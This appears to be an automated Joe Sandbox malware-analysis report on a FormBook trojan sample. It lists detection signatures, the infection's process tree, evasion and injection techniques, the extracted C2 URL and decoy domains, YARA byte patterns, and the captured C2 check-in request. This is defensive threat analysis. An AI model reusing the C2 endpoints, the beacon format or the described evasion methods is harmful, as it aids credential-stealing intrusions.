Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
O1ySvN9SvL

Overview

General Information

Sample Name:O1ySvN9SvL (renamed file extension from none to exe)
Analysis ID:635319
MD5:caa4c5d863a9324fa6b3a735ed446897
SHA1:003348501064dc5646b19019592f8aefa4b44f5b
SHA256:6796f10e7f6140f26a49bf9446b2c75dfe0e6dc7d7d88cad5e09d9b608107851
Tags:32exeFormbooktrojan
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • O1ySvN9SvL.exe (PID: 6268 cmdline: "C:\Users\user\Desktop\O1ySvN9SvL.exe" MD5: CAA4C5D863A9324FA6B3A735ED446897)
    • zrztlh.exe (PID: 5816 cmdline: C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx MD5: 917BF3E1E68704B188F2192850C76FA6)
      • zrztlh.exe (PID: 6000 cmdline: C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx MD5: 917BF3E1E68704B188F2192850C76FA6)
        • explorer.exe (PID: 684 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • NETSTAT.EXE (PID: 6124 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
            • cmd.exe (PID: 6396 cmdline: /c del "C:\Users\user\AppData\Local\Temp\zrztlh.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 5704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.knoxvillehojo.com/a5vu/"], "decoy": ["larrysormonddaytona.com", "stagify.net", "polyesterwadding.com", "smartcontractauditing.xyz", "pier88lasvegas.com", "albertapainters.com", "mujid24s.com", "tidyaghast.com", "viatempo.com", "gzqgc.com", "pragmatic168.pro", "gapeminimalistic.online", "bloomingbeauties247.com", "thaiperty.com", "thebrocab.com", "dinkycars.net", "alphamaio.com", "skoolksa.com", "kongresprawnikow.info", "cryptoinvestment.gold", "datcapark.com", "ashleystawart.com", "allure-selectshop.com", "uranolite.xyz", "zjgw88.com", "jimsvarietyshop.com", "visual-industry.com", "inboxburn.xyz", "rrew.tools", "denizdenobjeler.com", "infoshope.com", "50mim6.com", "zdcx123.com", "668400.com", "authopro.xyz", "techwebsite.tech", "bluelioninvestments.com", "loncheraspanama.com", "legalnurseresearch.net", "leonwarrencapital.com", "456837.com", "killercatsss.com", "alpha-farmers.info", "myoilomega.com", "lavid.life", "toxicwaterclaims.com", "xiaoqimz.xyz", "nights.life", "digsbury.ventures", "apclimo.com", "tinasglorybutter.com", "savingshk.com", "chanongrouptowercrane.com", "ugcuk.com", "saint-leo.com", "jiujiecanyin.com", "santamariaweddings.com", "mandap.xyz", "saigonloving.com", "huntingblindbrackets.com", "myjurorapp.com", "multiconnectico.com", "xn--oy2ay6s.xn--55qx5d", "businessvlogging.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18819:$sqlite3step: 68 34 1C 7B E1
    • 0x1892c:$sqlite3step: 68 34 1C 7B E1
    • 0x18848:$sqlite3text: 68 38 2A 90 C5
    • 0x1896d:$sqlite3text: 68 38 2A 90 C5
    • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.532479062.00000000011E0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.532479062.00000000011E0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.0.zrztlh.exe.400000.6.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.0.zrztlh.exe.400000.6.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1aaf7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bafa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.0.zrztlh.exe.400000.6.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a19:$sqlite3step: 68 34 1C 7B E1
        • 0x17b2c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a48:$sqlite3text: 68 38 2A 90 C5
        • 0x17b6d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a5b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17b83:$sqlite3blob: 68 53 D8 7F 8C
        2.0.zrztlh.exe.400000.8.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.0.zrztlh.exe.400000.8.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 22 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.5188.114.97.349798802031449 05/27/22-19:11:52.547625
          SID:2031449
          Source Port:49798
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5188.114.97.349798802031412 05/27/22-19:11:52.547625
          SID:2031412
          Source Port:49798
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5188.114.97.349798802031453 05/27/22-19:11:52.547625
          SID:2031453
          Source Port:49798
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.knoxvillehojo.com/a5vu/"], "decoy": ["larrysormonddaytona.com", "stagify.net", "polyesterwadding.com", "smartcontractauditing.xyz", "pier88lasvegas.com", "albertapainters.com", "mujid24s.com", "tidyaghast.com", "viatempo.com", "gzqgc.com", "pragmatic168.pro", "gapeminimalistic.online", "bloomingbeauties247.com", "thaiperty.com", "thebrocab.com", "dinkycars.net", "alphamaio.com", "skoolksa.com", "kongresprawnikow.info", "cryptoinvestment.gold", "datcapark.com", "ashleystawart.com", "allure-selectshop.com", "uranolite.xyz", "zjgw88.com", "jimsvarietyshop.com", "visual-industry.com", "inboxburn.xyz", "rrew.tools", "denizdenobjeler.com", "infoshope.com", "50mim6.com", "zdcx123.com", "668400.com", "authopro.xyz", "techwebsite.tech", "bluelioninvestments.com", "loncheraspanama.com", "legalnurseresearch.net", "leonwarrencapital.com", "456837.com", "killercatsss.com", "alpha-farmers.info", "myoilomega.com", "lavid.life", "toxicwaterclaims.com", "xiaoqimz.xyz", "nights.life", "digsbury.ventures", "apclimo.com", "tinasglorybutter.com", "savingshk.com", "chanongrouptowercrane.com", "ugcuk.com", "saint-leo.com", "jiujiecanyin.com", "santamariaweddings.com", "mandap.xyz", "saigonloving.com", "huntingblindbrackets.com", "myjurorapp.com", "multiconnectico.com", "xn--oy2ay6s.xn--55qx5d", "businessvlogging.com"]}
          Multi AV Scanner detection for submitted file
          Source: O1ySvN9SvL.exeVirustotal: Detection: 49%Perma Link
          Source: O1ySvN9SvL.exeReversingLabs: Detection: 53%
          Yara detected FormBook
          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.zrztlh.exe.730000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.zrztlh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.zrztlh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.zrztlh.exe.730000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.532479062.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.447718606.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.533348401.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.509506176.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.489068141.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.445889127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.716275585.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.443445716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: www.knoxvillehojo.com/a5vu/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeReversingLabs: Detection: 50%
          Source: 1.2.zrztlh.exe.730000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.zrztlh.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.zrztlh.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.zrztlh.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.zrztlh.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: O1ySvN9SvL.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: netstat.pdbGCTL source: zrztlh.exe, 00000002.00000002.533807993.00000000030C0000.00000040.10000000.00040000.00000000.sdmp, zrztlh.exe, 00000002.00000002.532341402.0000000000D99000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\bbzbv\zvllpn\ulml\6c213aee395f4218a983d22c1476bfe1\cpuiyl\nereonvn\Release\nereonvn.pdb source: O1ySvN9SvL.exe, 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp, O1ySvN9SvL.exe, 00000000.00000002.476520590.0000000002857000.00000004.00000800.00020000.00000000.sdmp, zrztlh.exe, 00000001.00000000.435751978.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp, zrztlh.exe, 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp, zrztlh.exe, 00000002.00000000.441820881.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp, NETSTAT.EXE, 0000000A.00000002.719075583.000000000385F000.00000004.10000000.00040000.00000000.sdmp, zrztlh.exe.0.dr, nsr4D4E.tmp.0.dr
          Source: Binary string: netstat.pdb source: zrztlh.exe, 00000002.00000002.533807993.00000000030C0000.00000040.10000000.00040000.00000000.sdmp, zrztlh.exe, 00000002.00000002.532341402.0000000000D99000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: zrztlh.exe, 00000001.00000003.439382237.0000000002430000.00000004.00001000.00020000.00000000.sdmp, zrztlh.exe, 00000001.00000003.440475430.000000001D330000.00000004.00001000.00020000.00000000.sdmp, zrztlh.exe, 00000002.00000003.449985411.000000000108A000.00000004.00000800.00020000.00000000.sdmp, zrztlh.exe, 00000002.00000002.532918261.000000000133F000.00000040.00000800.00020000.00000000.sdmp, zrztlh.exe, 00000002.00000002.532513113.0000000001220000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.533826728.0000000003199000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.532287288.0000000000E78000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: zrztlh.exe, 00000001.00000003.439382237.0000000002430000.00000004.00001000.00020000.00000000.sdmp, zrztlh.exe, 00000001.00000003.440475430.000000001D330000.00000004.00001000.00020000.00000000.sdmp, zrztlh.exe, 00000002.00000003.449985411.000000000108A000.00000004.00000800.00020000.00000000.sdmp, zrztlh.exe, 00000002.00000002.532918261.000000000133F000.00000040.00000800.00020000.00000000.sdmp, zrztlh.exe, 00000002.00000002.532513113.0000000001220000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.533826728.0000000003199000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.532287288.0000000000E78000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exeCode function: 0_2_00405426 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405426
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exeCode function: 0_2_00405D9C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,0_2_00405D9C
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exeCode function: 0_2_004026A1 FindFirstFileA,0_2_004026A1
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 4x nop then pop edi2_2_0040E454
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 4x nop then pop edi2_2_0040E481
          Source: C:\Users\user\AppData\Local\Temp\zrztlh.exeCode function: 4x nop then pop edi2_2_00417D7E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi10_2_007CE454
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi10_2_007CE481
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi10_2_007D7D7E

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.savingshk.com
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.3 80Jump to behavior
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49798 -> 188.114.97.3:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49798 -> 188.114.97.3:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49798 -> 188.114.97.3:80
          Uses netstat to query active network connections and open ports
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.knoxvillehojo.com/a5vu/
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /a5vu/?l2MHK=FVYX5&4hOD6=FXMAgLN/IrBd2h0A7KmJ0dUV04fd60Tmz3QO5NzukmZcmTlm3Sf9IrYXmxrDB/U5IQUf HTTP/1.1Host: www.savingshk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: NETSTAT.EXE, 0000000A.00000002.719201108.0000000003D4F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.savingshk.com/a5vu/?l2MHK=FVYX5&4hOD6=FXMAgLN/IrBd2h0A7KmJ0dUV04fd60Tmz3QO5NzukmZcmTlm3S
          Source: unknownDNS traffic detected: queries for: www.savingshk.com
          Source: global trafficHTTP traffic detected: GET /a5vu/?l2MHK=FVYX5&4hOD6=FXMAgLN/IrBd2h0A7KmJ0dUV04fd60Tmz3QO5NzukmZcmTlm3Sf9IrYXmxrDB/U5IQUf HTTP/1.1Host: www.savingshk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: O1ySvN9SvL.exe, 00000000.00000002.476364274.000000000072A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\Desktop\O1ySvN9SvL.exeCode function: 0_2_00404FDD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FDD

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.zrztlh.exe.730000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.zrztlh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.zrztlh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.zrztlh.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.zrztlh.exe.730000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.532479062.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.447718606.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.533348401.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.509506176.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.489068141.0000000005327000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.445889127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.716275585.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.443445716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.0.zrztlh.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.zrztlh.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.zrztlh.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.zrztlh.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.zrztlh.exe.730000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.zrztlh.exe.730000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.zrztlh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.zrztlh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.zrztlh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.zrztlh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.zrztlh.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.zrztlh.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.zrztlh.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.zrztlh.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.zrztlh.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.zrztlh.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.zrztlh.exe.730000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.zrztlh.exe.730000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.532479062.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.532479062.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
